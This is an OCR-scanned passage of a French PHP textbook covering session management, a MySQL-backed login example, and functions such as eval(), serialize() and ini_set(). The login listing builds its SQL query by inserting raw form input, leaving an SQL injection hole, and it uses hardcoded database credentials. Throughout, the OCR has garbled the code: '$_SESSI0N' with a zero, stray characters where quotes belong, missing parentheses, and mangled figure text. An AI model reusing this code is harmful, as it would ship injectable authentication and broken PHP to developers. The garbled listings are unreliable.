Avant d' utiliser la gestion des sessions PHP, vous devez commencer par en ouvrir une. 
Pour cela, vous avez deux possibilites. 

La premiere, qui est la plus simple, consiste a commencer un script par un appel a la 
fonction session start () : 

session_start( ) ; 

Cette fonction determine s'il y a deja une session en cours. Si ce n'est pas le cas, elle 
cree un ID de session donnant acces au tableau superglobal $ SESSION. Si une session 
existe deja, session start ( ) charge les variables de session enregistrees, afin que vous 
puissiez les utiliser. 
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II est essentiel d'appeler systematiquement la fonction session start () au debut de 
chaque script utilisant des sessions ; sinon le script ne pourra pas acceder a ce qui est 
stocke dans la session. 

La seconde possibilite d'ouverture de session consiste a configurer PHP afin qu'il ouvre 
automatiquement une session a chaque visite de votre site. Pour cela, vous devez definir 
l'option session. auto start dans le fichier php.ini (nous y reviendrons lorsque nous 
etudierons la configuration du controle de sessions). Cette methode possede un desa- 
vantage majeur : lorsque auto start est activee, vous ne pouvez pas utiliser un objet 
comme variable de session car la definition de la classe de cet objet doit etre chargee 
avant de commencer la session pour pouvoir creer l'objet dans la session. 

Enregistrement des variables de session 

Depuis PHP 4. 1 , les variables de session sont enregistrees dans le tableau superglobal 
$ SESSION. Pour creer une variable de session, il suffit de definir un element dans ce 
tableau, comme ici : 

$_SESSI0N[ 'ma_var' ] = 5; 

La variable de session que vous venez de creer sera conservee jusqu'a la fin de la 
session ou jusqu'a ce que vous la reinitialisiez manuellement. Une session peut egale- 
ment se terminer naturellement apres un certain delai fixe par la variable 
session . go maxlif etime du fichier php.ini, qui indique le temps en secondes que peut 
durer une session avant que le ramasse-miettes n'y mette fin. 

Utilisation de variables de session 

Pour qu'une variable de session ait la portee requise pour etre utilisable, vous devez 
tout d'abord ouvrir une session en appelant session start ( ). Vous pouvez ensuite 
acceder a la variable via le tableau superglobal $ SESSION (par exemple, avec 
$ SESSION [ 'ma var 1 ]). 

Lorsque vous utilisez un objet comme variable de session, il est important que vous 
incluiez la definition de classe avant d'appeler session start () pour recharger les 
variables de session. De cette facon, PHP saura comment reconstruire l'objet de 
session. 

Par ailleurs, vous devez faire attention lorsque vous verifiez si des variables de session 
ont bien ete definies (via isset() ou empty (), par exemple). En effet, l'utilisateur 
pouvant definir des variables via les methodes GET ou POST, vous devez passer par 
$ SESSION pour savoir si une variable est une variable de session enregistree : 

if (isset($_SESSION[ 'ma_var' ] ) ) ... 
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Suppression des variables et destruction de la session 

Lorsque vous en avez termine avec une variable de session, vous pouvez la supprimer. 
Vous pouvez le faire directement en supprimant 1' element approprie du tableau 
$ SESSION, comme dans l'exemple suivant : 

unset ($_SESSI0N[ 'ma_var' ] ; 

L'utilisation de session unregister() et de session unset () n'est plus requise et 
n'est pas conseillee. Ces fonctionnalites etaient utilisees avant 1' introduction de 
$ SESSION. 

Vous ne devez pas essayer de supprimer le tableau $ SESSION complet car vous 
desactiveriez des sessions. Pour supprimer toutes les variables de session en une 
fois, faites : 

$_SESSI0N=array() ; 

Lorsque vous en avez termine avec une session, supprimez toutes les variables, puis 
appelez la fonction : 

session_destroy ( ) ; 

pour supprimer l'ID de cette session. 

Un exemple de session simple 

Examinons plus concretement les implications des notions precedentes a l'aide d'un 
exemple. Nous implementerons un controle de session portant sur un ensemble de trois 
pages. 

Dans la premiere page, nous demarrerons une session et nous enregistrerons la 
variable $ SESSION [ ' var sess']. Le code correspondant est donne dans le 
Listing 21.1. 

Listing 21.1 : pagel.php — Demarrage d'une session et enregistrement d'une variable 

<?php 

session_start ( ) ; 

$_SESSI0N[ 'var_sess' ] = "Bonjour a tous !"; 

echo '$_SESSI0N[\ 'var_sess\ 1 ] contient 1 
. $_SESSI0N[ 1 var_sess' ] . ' <br />'; 

?> 

<a href="page2.php">Page suivante</a> 
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Le script du Listing 21.1 enregistre la variable et definit sa valeur. Son execution 
conduit au resultat montre a la Figure 21.1. 

Figure 21.1 i ~ ^ n Pigc i ~~ 

Le script pagel .php (ZTEP' © GD C.Lil & T ) " (ET^ 

affiche la valeur initiale 

de la variable de session. S_SESSION['var_sess'] conticnt Bonjour k tous ! 

Papc suivante 



Termine M 



C'est la valeur finale de la variable dans la page qui sera disponible pour les pages 
suivantes. A la fin du script, la variable de session est serialisee, ou gelee, jusqu'a son 
rechargement par un autre appel a la fonction session start ( ). 

Le prochain script doit par consequent lui aussi debuter par un appel a la fonction 
session start ( ). Ce script est montre dans le Listing 21.2. 

Listing 21 .2 : page2.php — Acces a une variable de session et suppression de cette variable 

<?php 

session_start ( ) ; 

echo '$_SESSI0N[\ 'var_sess\ ' ] contient ' 
. $_SESSI0N[ ' var_sess' ] . '<br />'; 

unset($_SESSION[ 'var_sess' ] ) ; 

?> 

<a href="page3.php">Page suivante</a> 



Apres l'appel a la fonction session start (), la variable $ SESSION [ 'var sess' ] est 
disponible, avec la valeur qui y a ete precedemrnent enregistree (voir Figure 21.2). 



Figure 21.2 

La valeur de la variable 
de session a ete trans- 
mise a cette deuxieme 
page, via I'lD de session. 



Page 2 



$_SESSION['var_sc5s'] conticnt Bonjour k tous ! 
Papc suivante 



Apres avoir utilise la variable, nous la supprimons. La session existe toujours, mais la 
variable $ SESSION [ ' var sess ' ] n'existe plus. 

Vient ensuite le script page3.php, qui est le script final de cet exemple. Son code est 
donne dans le Listing 21.3. 
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Listing 21.3 : page3.php — Cloture de la session 



<?php 

session_start ( ) ; 

echo $_SESSI0N[\ 'var_sess\ 1 ] contient ' 

. $_SESSI0N[ 1 var_sess' ] . '<br />'; 



session_destroy ( ) : 



?> 



Comme le montre la Figure 21.3, nous n'avons plus acces a la valeur persistante de 
$ SESSION [ 'var sess 1 ]. 



Figure 21.3 

La variable de session 
n'est plus disponible. 



S_SESS ION[ ' var_sc ss'l contient 



Termine 



Avec certaines versions de PHP anterieures a 4.3, vous pouvez rencontrer un bogue 
lorsque vous tentez de supprimer des elements de $HTTP SESSION VARS ou de 
$ SESSION. Si vous ne parvenez pas a supprimer des elements, il vous reste la possi- 
bility de faire appel a session unregister( ) pour supprimer ces variables. 

Notre exemple se termine par un appel a session destroy () pour liberer l'ID de 
session. 



Configuration du controle de session 

II existe un certain nombre d'options de configuration que vous pouvez definir dans 
php.ini pour gerer le controle des sessions. Le Tableau 21.1 decrit les plus utiles. 

Tableau 21.1 : Options de configuration des sessions 



Nom de V option 


Valeur par defaut 


Effet 


session. auto start 


(desactivee) 


Demarrage automatique des sessions. 


session .cache expire 


180 


Precise la duree de vie, en minutes, des 
pages de session mises en memoire cache. 
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Tableau 21.1 : Options de configuration des sessions 



Nom de 1 'option 
session . cookie domain 

session . cookie lifetime 



Valeur par defaut Effet 



session . cookie path 



session . name 



session. save handler 



session. save path 



session. use cookies 



session . cookie secure 



session. hash function 



aucune 



PHPSESSID 



fichiers 



/tmp 



1 (active) 
(desactive) 

(MD5) 



Precise le domaine a definir dans le cookie 
de session. 

Fixe la duree de vie maximale du cookie 
de session sur l'ordinateur de l'utilisateur. 
La valeur 0, qui est la valeur par defaut, 
indique que le cookie doit expirer a la 
fermeture du navigateur web. 

Precise le chemin d'acces a utiliser avec le 
cookie de session. 

Precise le nom de la session qui est utilise 
comme nom de cookie dans le systeme de 
l'utilisateur. 

Definit 1' emplacement de stockage des 
donnees de session. Par defaut, elles sont 
enregistrees dans des fichiers. Elles 
peuvent etre enregistrees dans une base de 
donnees, mais il faut alors ecrire ses 
propres fonctions. 

Definit le chemin d'acces de 
l'emplacement oil sont stockees les 
donnees de session. Plus generalement, 
precise le parametre passe a la fonction de 
sauvegarde et defini par 
session, save handler. 

Configure les sessions de sorte que des 
cookies soient utilises cote client. 

Indique si les cookies ne doivent etre 
envoyes que sur des connexions 
securisees. 

Permet de preciser l'algorithme de 
hachage utilise pour produire l'ID de 
session. signifie MD5 (128 bits) et 1 
signifie SHA-1 (160 bits). Cette option de 
configuration n'est disponible qu'a partir 
de PHP 5. 
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Authentification avec le controle de session 

Nous terminerons ce chapitre par l'etude d'un exemple plus substantiel de mise en 
ceuvre du controle de session. 

L' application la plus classique du controle de session est sans doute le suivi des utili- 
sateurs apres leur authentification via un mecanisme de connexion (login). Dans ce 
dernier exemple, nous implementerons cette fonctionnalite en combinant 1' authenti- 
fication a partir d'une base de donnees MySQL avec 1' utilisation des sessions. Cette 
fonctionnalite formera la base du projet decrit au Chapitre 25 et sera reutilisee dans 
d'autres projets. Nous reutiliserons ici la base de donnees d' authentification creee au 
Chapitre 15. Pour plus de details sur cette base de donnees, reprenez le code du 
Listing 15.3. 

Notre exemple se compose de trois scripts simples. Le premier, auth _principal.php, 
fournit un formulaire d'ouverture de session et d' authentification pour les membres de 
notre site. Le second, membres_seuls.php, n'afhche des informations qu'aux utilisa- 
teurs ayant reussi a ouvrir une session. Le troisieme, deconnexion.php, permet a un 
utilisateur de fermer sa session. 

Pour bien comprendre le fonctionnement de ces trois pages, etudiez la Figure 21.4 : il 
s'agit de la page initiale, produite par l'execution de auth_principal.php. 



Mozilla Firefox 


CD 






Accueil 

Vous n'ctcs pas conncctd. 




Nom d'utilisaieur : 




Mot de passe : 




( Connexion ) 




Section rdscrvee aux membres 








Termine 



Figure 21.4 

L'utilisateur n'ayant pas encore ouvert de session, on lui presente une page de connexion. 

Cette page permet a l'utilisateur de s'authentifier. Lorsqu'un visiteur tente d'acceder a 
la section reservee aux membres du site sans s'etre d'abord connecte, il voit s'afficher 
le message presente a la Figure 21.5. 



Chapitre21 



Utilisation du controle de session en PHP 513 



Mozilla Firefox CD 

Reserve aux membres 

Vous n'ctcs pas connect*;. 

Sculs les mcrabrcs connects pcuvent lire ccttc page. 
Rctour a la papc d'accueil 

Terrnine ^ 

Figure 21.5 

Les visiteurs qui ne se sont pas authentifies ne sont pas autorises a acceder au contenu du site : 
un message les en informe. 



En revanche, si le visiteur se connecte (en fournissant le nom d'utilisateur 
utilisateuM et le mot de passe secret), puis tente d'acceder a la page des membres 
du site, il voit s'afficher la page montree a la Figure 21.6. 



Mozilla Firefox 

Reserve aux membres 

Bienvenue, utilisatcur 
Content] rdscrvfi aux membres. 
Rctour a la papc d'accueil 



Termine ^ 

Figure 21.6 

Une fois qu'un visiteur s'est authentifie, il peut acceder a la zone reservee aux membres du site. 



Examinons a present le code de cette application, qui est essentiellement contenu dans 
le script auth _principal.php presente dans le Listing 2 1 .4. 

Listing 21.4 : auth _principal.php — La partie principale de I'application d'authentification 



<?php 

session_start( ) ; 

if (isset($_POST[ ' utilisateur 1 ] ) && isset ($_P0ST[ ' mdp 1 ] ) ) { 
// Si 1 ' utilisateur a essaye d'ouvrir une session 
$utilisateur = $_POST[ ' utilisateur '] ; 
$mdp = $_P0ST[ 'mdp' ] ; 
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$db_conn = new mysqli( ' localhost ' , 'authweb', 'authweb', 'auth'); 

if (mysqli_connect_errno( ) ) { 
echo ' Echec de la connexion a la base : ' . mysqli_connect_error( ) ; 
exit() ; 

} 



$requete = 'select * from utilisateurs_ok 1 
. "where nom = 1 $utilisateur 1 " 
. " and mdp = shal ( ' $mdp ' ) " ; 

$resultat = $db_conn->query ($requete) ; 
if ($resultat->num_rows) { 

// s'il est enregistre dans la base de donnees 

$_SESSI0N[ 'utilisateur_ok' ] = $utilisateur; 

} 

$db_conn->close( ) ; 

} 

?><html> 
<body> 

<h1>Accueil</h1> 
<? 

if (isset($_SESSION[ ' utilisateur_ok ' ] ) ) { 
echo 'Bienvenue,' . $_SESSI0N[ ' utilisateur_ok ' ] . 1 <br />'; 
echo '<a href="deconnexion . php">Deconnexion</a><br />'; 
} else { 
if (isset($utilisateur) ) { 

// si sa tentative d'ouverture de session a echoue 
echo 'Connexion refusee.<br />'; 
} else { 

// 1 ' utilisateur n'a pas de session ouverte 
echo "Vous n'etes pas connecte.<br />"; 

} 

// affichage du formulaire pour ouvrir la session 

echo '<form method="post" action="auth_principal.php"> ' ; 

echo '<table>'; 

echo '<tr><td>Nom d ' utilisateur :</td>'; 

echo '<td><input type="text" name="utilisateur"></td></tr> ' ; 
echo '<tr><td>Mot de passe :</td>'; 

echo '<td><input type=" password" name="mdp"></td></tr> ' ; 
echo '<tr><td colspan="2" align="center">' ; 
echo '<input type="submit" value="Connexion"></td></tr> ' ; 
echo ' </table></f orm> ' ; 

} 

?> 

<br> 

<a href="membres_seuls.php">Section reservee aux membres</a> 

</body> 

</html> 
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La logique implementee dans ce script est relativement complexe, parce qu'elle affiche 
le formulaire de connexion, accomplit Taction associee au formulaire et contient le 
code HTML qui sera renvoye en cas d'echec de la connexion. 

Toute Tactivite de ce script repose sur la variable de session utilisateur ok. Lidee 
fondamentale est qu'en cas de succes d'une connexion nous enregistrons une variable 
de session appelee $ SESSION [ 'utilisateur ok' ] qui contient Tidentifiant de l'utili- 
sateur. 

auth _principcil.php commence par appeler la fonction session start (), ce qui provoque 
le chargement de la variable de session utilisateur ok si Tutilisateur s'est enregistre. 

Lorsque Tinterpreteur PHP passe ce script en revue pour la premiere fois (pour un 
nouvel utilisateur), aucune des conditions if n'est satisfaite et c'est directement la fin 
du script qui est executee : Tutilisateur est alors informe qu'il doit se connecter pour 
acceder au site et un formulaire de connexion lui est alors propose : 

echo '<form method="post" action="auth_principal.php"> ' ; 

echo ' <table> ' ; 

echo '<tr><td>Nom d ' utilisateur :</td>'; 

echo '<td><input type="text" name="utilisateur"></td></tr> ' ; 

echo '<tr><td>Mot de passe :</td>'; 

echo '<td><input type="password" name="mdp"></td></tr> ' ; 

echo '<tr><td colspan="2" align="center"> ' ; 

echo '<input type="submit" value="Connexion"></td></tr> ' ; 

echo ' </table></f orm> ' ; 

Lorsque le visiteur actionne le bouton Connexion de ce formulaire, le script 
auth _principal.php est a nouveau charge et execute depuis le debut. Cette fois-ci, un 
nom d' utilisateur et un mot de passe ont ete saisis et sont stockes, respectivement, dans 
les variables $ POST[ ' utilisateur ' ] et $ POST[ ' mdp ' ]. Si ces variables sont definies, 
Tinterpreteur PHP traite le bloc de code consacre a T authentification : 

if (isset($_POST[ 'utilisateur' ] ) && isset ($_P0ST[ ' mdp ' ] ) ) { 
// Si 1 ' utilisateur a essaye d'ouvrir une session 
$utilisateur = $_P0ST[ ' utilisateur '] ; 
$mdp = $_P0ST[ 'mdp' ] ; 

$db_conn = new mysqli( ' localhost ' , 'authweb', 'authweb', 'auth'); 

if (mysqli_connect_errno( ) ) { 
echo ' Echec de la connexion a la base : ' . mysqli_connect_error( ) ; 
exit() ; 

} 



$requete = 'select * from utilisateurs_ok 
. "where nom = ' $utilisateur ' " 
. " and mdp = shal ( ' $mdp ' ) " ; 

$resultat = $db_conn->query ($requete) ; 
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Ce code etablit la connexion a la base de donnees MySQL et verifie que l'identifiant et 
le mot de passe saisis par l'utilisateur y sont bien enregistres. Si tout concorde, nous 
creons la variable $ SESSION [ ' utilisateur ok 1 ], qui contient le nom de l'utilisateur 
concerne, afin de pouvoir assurer le suivi de l'utilisateur qui a ouvert cette session : 

if ($resultat->num_rows) { 

// s'il est enregistre dans la base de donnees 
$_SESSI0N[ 'utilisateur_ok' ] = $utilisateur ; 

} 

$db_conn->close( ) ; 

} 

Comme nous connaissons desormais l'identite du visiteur, il n'est plus necessaire 
d'afficher le formulaire d'ouverture de session. Au contraire, le visiteur doit etre 
informe que son identite est connue, qu'il a ouvert une session et qu'il peut la fermer 
quand bon lui semble : 

if (isset($_SESSION[ ' utilisateur_ok ' ] ) ) { 

echo 'Bienvenue, 1 . $_SESSI0N[ 1 utilisateur_ok ' ] . 1 <br />'; 
echo '<a href ="deconnexion . php">Deconnexion</a><br />'; 

} 

Lorsqu'une tentative de connexion echoue, quelle qu'en soit la raison, nous disposons 
d'une variable Sutilisateur, mais pas de variable $ SESSION! 1 utilisateur ok']. 
Nous pouvons done lui envoyer un message d'erreur : 

if (isset($utilisateur) ) { 

// si sa tentative d'ouverture de session a echoue 
echo 'Connexion refusee.<br />'; 

} 

Voila pour le script principal. Examinons a present la page reservee aux membres du 
site, dont le code est montre dans le Listing 21.5. 

Listing 21.5 : membres_seuls.php — Le code de la section reservee aux membres du site 
verifie que les visiteurs sont dument autorises 



<?php 

session_start ( ) ; 

echo '<h1>Reserve aux membres</h1>' ; 

// Verification de la variable de session 

if (isset($_SESSION['utilisateur_ok'])) { 

echo ' <p>Bienvenue, ' . $_SESSI0N[ ' utilisateur_ok ' ] . '</p>'; 

echo '<p>Contenu reserve aux membres. </p> ' ; 
} else { 

echo "<p>Vous n'etes pas connecte .</p>" ; 

echo '<p>Seuls les membres connectes peuvent lire cette page.</p>'; 

} 

echo '<a href="auth_principal.php">Retour a la page d\ ' accueil</a> ' ; 

?> 
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Ce code est tres simple. II ouvre une session et verifie que la session courante contient 
un utilisateur enregistre en examinant si la valeur de $ SESSION [ 'utilisateur ok' ] 
est dermic Si 1' utilisateur a bien ouvert une session, il peut acceder au contenu reserve 
aux membres. Sinon il est informe qu'il n'y est pas autorise. 

Pour finir, le script deconnexion . php met fin a la session ouverte par l'utilisateur. Son 
code est donne dans le Listing 21.6. 

Listing 21.6 : deconnexion. php — Ce script supprime la variable de session et met fin 
a la session 



<?php 

session_start ( ) ; 

// Stocke pour verifier si l'utilisateur "etait" connecte 
$ancien_utilisateur = $_SESSI0N [ ' utilisateur_ok ' ] ; 
unset($_SESSION[ ' utilisateur_ok ' ] ) ; 
session_destroy ( ) ; 

?> 

<html> 
<body> 

<h1>Deconnexion</h1 > 
<?php 

if (! empty ($ancien_utilisateur) ) { 

echo 'Vous etes maintenant deconnecte . <br />'; 
} else { 

// Si l'utilisateur n'avait pas ouvert de session mais qu'il est tout 
// de meme parvenu a cette page 

echo "Vous n'etiez pas connecte, vous n'avez done pas ete deconnecte" 
. '<br />' ; 

} 

?> 

<a href="auth_principal.php">Retour a la page d\ ' accueil</a> 

</body> 

</html> 



Si le code de ce script est simple, il n'en est pas moins important. II ouvre une session, 
stocke l'ancien nom d'utilisateur, supprime la variable de session associee a l'utilisa- 
teur et detruit la session. II affiche ensuite un message a 1' intention de l'utilisateur, 
message dont le contenu est different selon que l'utilisateur vient d'etre deconnecte ou 
qu'il n'a jamais ete connecte. 

Cet ensemble de scripts simples forme la base de diverses autres applications qui seront 
etudiees dans les prochains chapitres. 

Pour aller plus loin 

Pour en apprendre plus sur les cookies, consultez la page http://wp.netscape.com/ 
newsref/std/cookie_spec.html. 
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Pour la suite 

Cette quatrieme partie de notre ouvrage touche a sa fin. Toutefois, avant d'en venir a 
l'etude de projets, nous examinerons diverses possibilites tres utiles offertes par le 
langage PHP et que nous n'avons pas encore eu l'occasion d'aborder jusqu'ici. 



22 



Autres fonctions et possibilites 

offertes par PHP 

Certaines fonctions et possibilites offertes par PHP n'entrent dans aucune categorie 
particuliere et n'ont pas encore ete, de ce fait, abordees jusqu'ici. Ce chapitre leur est 
done consacre. 

Evaluation de chaTnes : evalQ 

La fonction eval ( ) evalue une chame comme s'il s'agissait de code PHP 
Par exemple, la ligne de code : 

eval ( "echo 'Bonjour a tous';" ); 
prend la chaine qui lui est passee en parametre et 1' execute. Elle produit le meme resultat 
que 1' instruction : 

echo ' Bonjour a tous ' ; 

La fonction eval() peut etre utile dans de nombreuses situations. Vous pouvez, par 
exemple, stocker des blocs de code dans une base de donnees, les recuperer puis les 
evaluer avec eval( ). Vous pourriez egalement produire du code dans une boucle, puis 
l'executer avec eval ( ) . 

Lutilisation la plus courante de eval() consiste a 1'employer dans le cadre d'un 
systeme de modeles (templates). Vous pouvez charger un melange de HTML, de PHP et 
de texte brut a partir d'une base de donnees ; votre systeme de modeles peut appliquer 
une mise en forme a ce contenu, puis le traiter avec eval( ) afm que le code PHP soit 
execute. 

La fonction eval( ) est precieuse pour mettre a jour ou corriger du code existant. Par 
exemple, supposez que vous ayez accumule tout un ensemble de scripts qui necessitent 
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une modification previsible. Vous pourriez, meme si cela ne serait pas tres efficace, 
ecrire un script qui charge un ancien script dans une chaine, effectue des remplacements 
de certains blocs de code au moyen d' expressions regulieres, puis utilise la fonction 
eval( ) pour executer le script ainsi modifie. 

II est meme envisageable qu'une personne, vraiment tres confiante, decide de permettre 
la saisie de code PHP dans un formulaire pour l'executer ensuite sur son propre serveur. 

Achevement de I'execution : die() et exitO 

Jusqu'ici dans cet ouvrage, nous avons utilise la construction exit pour mettre un terme 
a I'execution des scripts. Le mot-cle exit apparaissait alors seul sur une ligne, comme 
ici : 

exit; 

Cette ligne de code ne renvoie rien. Vous pouvez egalement utiliser son alias, die ( ) . 

Pour que 1' achevement d'un script apporte un peu plus d'information, vous pouvez 
passer un parametre a exit ( ) . Cette fonction peut en effet servir a afficher un message 
d'erreur ou a executer une fonction avant la fin d'un script. Ce precede ne devrait pas 
etre inconnu des programmeurs Perl. Par exemple : 

exit('Le script se termine.'); 

Le plus souvent, toutefois, elle est associee par le biais d'un "OU" (or) a une instruction 
susceptible d'echouer, comme l'ouverture d'un fichier ou la connexion a une base de 
donnees : 

mysql_query ($requete) or die( " Impossible d'executer la requete."); 

Au lieu d' afficher simplement un message d'erreur, vous pouvez appeler une derniere 
fonction avant que le script ne s'acheve : 

function message_erreur( ) { 
echo ' Erreur MySQL : ' ; 
echo mysql_error( ) ; 

} 

mysql_query ($requete) or die(message_erreur( ) ) ; 

Cette approche permet d'informer l'utilisateur des raisons de l'echec du script, avant 
que I'execution ne soit interrompue, ou peut etre utilisee pour fermer des elements 
HTML ou supprimer une page a moitie complete du tampon de sortie. 

De la meme maniere, vous pourriez vous envoyer un courrier electronique vous infor- 
mant qu'une erreur s'est produite, consigner les erreurs dans un fichier journal ou 
lancer une exception. 
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Serialisation de variables et d'objets 

La serialisation est le processus qui consiste a transformer tout ce qui peut etre stocke 
dans une variable ou un objet en un flux d' octets pouvant etre enregistre dans une base 
de donnees ou passe de page en page via une URL. Sans ce processus, il est difficile 
d'enregistrer ou de passer l'integralite du contenu d'un tableau ou d'un objet. 

La serialisation a toutefois perdu de son utilite depuis 1' introduction du controle de 
session car elle etait generalement utilisee pour des operations pour lesquelles on 
dispose desormais du controle de session. En fait, les fonctions de controle des sessions 
serialisent les variables de session pour les enregistrer entre les requetes HTTP. 

Vous pouvez neanmoins souhaiter enregistrer un tableau ou un objet PHP dans des 
fichiers et des bases de donnees. Dans ce cas, deux fonctions sont a votre disposition : 
serialize( ) et unserialize( ). 

Vous pouvez appeler la fonction serialize ( ) de la maniere suivante : 

$objet_serialise = serialize ($mon_ob jet) ; 

Pour comprendre en quoi consiste exactement une serialisation, examinez le resultat 
renvoye par l'appel a serialize () : vous constaterez que la fonction convertit le 
contenu d'un objet ou d'un tableau en une chame de carac teres. 

Par exemple, considerons le resultat renvoye par serialize ( ) lorsque celle-ci est appliquee 
a un objet employe, defini et instancie de la maniere suivante : 

class employe { 
public $nom; 
public $id_employe; 

}; 

$un_emp = new employe; 
$un_emp->nom = 'Fred'; 
$un_emp->id_employe = 5324; 

La serialisation de cet objet puis l'affichage du resultat obtenu dans la fenetre du navi- 
gateur produisent la ligne suivante : 

0:7: "employe" :2: {s:3: "nom" ; s :4: "Fred" ;s: 10: "id_employe" ;i:5324; } 

La relation entre les donnees de l'objet initial et les donnees serialisees est ici evidente. 

Les donnees serialisees etant simplement du texte, elles peuvent etre facilement enre- 
gistrees dans une base de donnees ou dans un fichier, mais n'oubliez pas d'utiliser 
mysql real escape string( ) avant d'ecrire du texte dans une base de donnees, afin 
de proteger les caracteres speciaux qui pourraient s'y trouver. Les nombreux guillemets 
figurant dans les donnees serialisees precedentes montrent bien 1' importance de ce 
traitement prealable. 
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Pour remettre les donnees dans leur format d'origine, appelez la fonction unseria 
lize() : 

$nouvel_objet = unserialize($objet_serialise) ; 

Lorsque vous serialisez des objets ou que vous les utilisez comme variables de session, 
il faut bien se rappeler que PHP a besoin de connaitre la structure d'une classe avant de 
pouvoir en creer des instances. Vous devez done inclure la definition de la classe avant 
l'appel a session start( ) ou a unserialize( ). 

Obtention d'informations sur I'environnement PHP 

Plusieurs fonctions permettent d'obtenir des informations sur la maniere dont PHP est 
configure. 

Liste des extensions chargees 

Vous pouvez facilement connaitre les ensembles de fonctions disponibles ainsi que les fonc- 
tions au sein de chacun de ces ensembles grace aux fonctions get loaded extensions ( ) et 
get extension funcs(). 

La fonction get loaded extensions () renvoie un tableau de tous les ensembles de 
fonctions disponibles dans l'installation PHP. La fonction get extension funcs() 
renvoie un tableau contenant toutes les fonctions disponibles dans 1' ensemble de fonctions 
ou dans 1' extension qui lui est passe en parametre. 

Le script du Listing 22.1 utilise ces deux fonctions pour enumerer toutes les fonctions 
disponibles dans votre installation PHP. 

Listing 22.1 : listejfonctions.php — Ce script enumere les extensions disponibles 
dans ('installation PHP et les fonctions de chaque extension 



<?php 

echo 'Cette installation supporte les jeux de fonctions suivants : 

. '<br />' ; 
$extensions = get_loaded_extensions ( ) ; 
foreach ($extensions as $extension) { 

echo "$extension <br />"; 

echo ' <ul> ' ; 

$fcts_ext = get_extension_funcs($extension) ; 
foreach ($fcts_ext as $fonction) { 
echo "<li>$fonction</li>" ; 

} 

echo ' </ul> ' ; 

} 
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Vous remarquerez que la fonction get loaded extensions ( ) ne prend aucun parametre, 
tandis que la fonction get extension f uncs ( ) prend le nom de l'extension comme seul 
parametre. 

Les informations ainsi obtenues peuvent se reveler precieuses pour determiner si 
1' installation d'une extension s'est deroulee avec succes ou si vous souhaitez ecrire du 
code portable qui produit des messages de diagnostic utiles lors de son installation. 

Identification du proprietaire d'un script 

Vous pouvez connaitre le proprietaire du script en cours d' execution par un appel a la 
fonction get current user() : 

echo get_current_user( ) ; 
Cette fonction peut servir a resoudre des problemes lies aux permissions. 

Determination de la date de derniere modification d'un script 

II est generalement tres apprecie d'ajouter une date de derniere modification sur 
chacune des pages d'un site web. 

La date de derniere modification d'un script peut etre connue via la fonction getlastmod ( ) 
(notez 1' absence de caractere de soulignement dans le nom de cette fonction), comme suit : 

echo date('g:i a, j M Y 1 ,getlastmod( ) ) ; 
La fonction getlastmod() renvoie une etiquette temporelle Unix qui peut ensuite etre 
mise en forme au moyen de la fonction date ( ) arm d'obtenir une date plus lisible pour 
les visiteurs. 

Modification temporaire de I'environnement d'execution 

Les parametres de configuration du fichier php.ini peuvent etre consultes ou modifies 
pendant la duree de 1' execution d'un script. Cette possibility peut etre tres utile, notam- 
ment pour adapter la valeur de la directive max execution time si vous savez que 
1' execution d'un script prendra du temps. 

Vous pouvez acceder aux parametres de configuration PHP et les modifier au moyen 
des fonctions in i get()etini set(). 

Le Listing 22.2 montre un script simple utilisant ces fonctions. 

Listing 22.2 : iniset.php — Ce script reinitialise des variables du fichier php.ini 

<?php 

$ancien_max_execution_time = ini_set ( ' max_execution_time ' , 120); 
echo "Ancien delai max = $ancien_max_execution_time <br />"; 
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$max_execution_time = ini_get( "max_execution_time" ) ; 
echo "Nouveau delai max : $max_execution_time <br />"; 

?> 

La fonction ini set ( ) prend deux parametres. Le premier est le nom de la directive de 
configuration du fichier php. ini a modifier et le second est la nouvelle valeur que vous 
souhaitez lui affecter. Cette fonction renvoie l'ancienne valeur de la directive. 

Dans le Listing 22.2, la valeur de 30 secondes par defaut de la duree maximale d'execution 
d'un script (ou quelle que soit sa valeur courante dans php.ini) est changee en 120 secondes. 

La fonction ini get ( ) ne fait que verifier la valeur de la directive de configuration qui 
lui est passee en parametre (sous forme de chaine). Dans le Listing 22.2, cette fonction 
est simplement utilisee pour verifier que la valeur du parametre a bien ete modinee. 

Toutes les options INI ne peuvent pas etre configurees de cette maniere. Chaque option 
possede un niveau auquel elle peut etre dermic Les niveaux possibles sont les suivants : 

■ PHP INI USER. Vous pouvez modifier ces valeurs dans vos scripts avec ini set(). 

■ PHP INI PERDIR. Vous pouvez modifier ces valeurs dans php.ini ou dans les fichiers 
.htaccess ou httpd.conf si vous utilisez Apache. Le fait que vous puissiez modifier 
ces valeurs dans des fichiers .htaccess signifie que vous pouvez les modifier reper- 
toire par repertoire - d'ou le nom utilise (PERDIR). 

■ PHP INI SYSTEM. Vous pouvez modifier ces valeurs dans les fichiers php.ini ou 
httpd.conf. 

■ PHP INI ALL. Vous pouvez modifier ces valeurs de l'une des manieres precedentes 
(dans un script, dans un fichier .htaccess ou dans vos fichiers httpd.conf ou php.ini). 

L ensemble complet des options INI et des niveaux auxquels elles peuvent etre definies 
est presente dans le manuel PHP a l'adresse http://www.php.net/ini_set. 

Colorisation du code source 

PHP comprend un mecanisme de colorisation du code semblable a celui que Ton trouve 
dans de nombreux editeurs de texte. Ce dispositif est notamment tres appreciable lors- 
que du code doit etre partage entre plusieurs programmeurs ou presente sur une page 
web pour y etre commente. 

Les fonctions show source () et highlight file() sont identiques (la fonction 
show source() est, en realite, un alias de la fonction highlight f ile( )). Chacune de 
ces fonctions prend un nom de fichier en parametre (qui doit etre un fichier PHP pour 
que le resultat renvoye par ces fonctions soit significatif). Par exemple : 

show_source( 'liste_fonctions.php' ) ; 
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Ce fichier sera alors affiche dans la fenetre du navigateur avec des couleurs differentes 
selon que le texte decrit une chaine, un commentaire, un mot-cle ou du code HTML. La 
sortie est presentee sur un fond uni. Tout le contenu qui n'entre pas dans les categories 
citees precedemment est affiche dans une couleur par defaut. 

La fonction hightlight string ( ) opere de la meme maniere, sauf qu'elle prend une 
chaine en parametre et 1' affiche dans le navigateur en mettant en evidence sa syntaxe a 
l'aide de couleurs. 

Les couleurs appliquees par l'interpreteur PHP pour coloriser le code peuvent etre definies 
dans le fichier de configuration php.ini, dans la section suivante : 

; Couleurs pour la colorisation de la syntaxe 

highlight . string = #DD0000 

highlight . comment = #FF9900 

highlight . keyword = #007700 

highlight.bg = #FFFFFF 

highlight. default = #0000BB 

highlight.html = #000000 

Ces couleurs doivent etre indiquees dans le format RVB standard de HTML. 
Utiliser PHP en ligne de commande 

Vous pouvez ecrire ou telecharger un grand nombre de petits programmes et les 
executer en ligne de commande. Si vous travaillez sur un systeme Unix, ces program- 
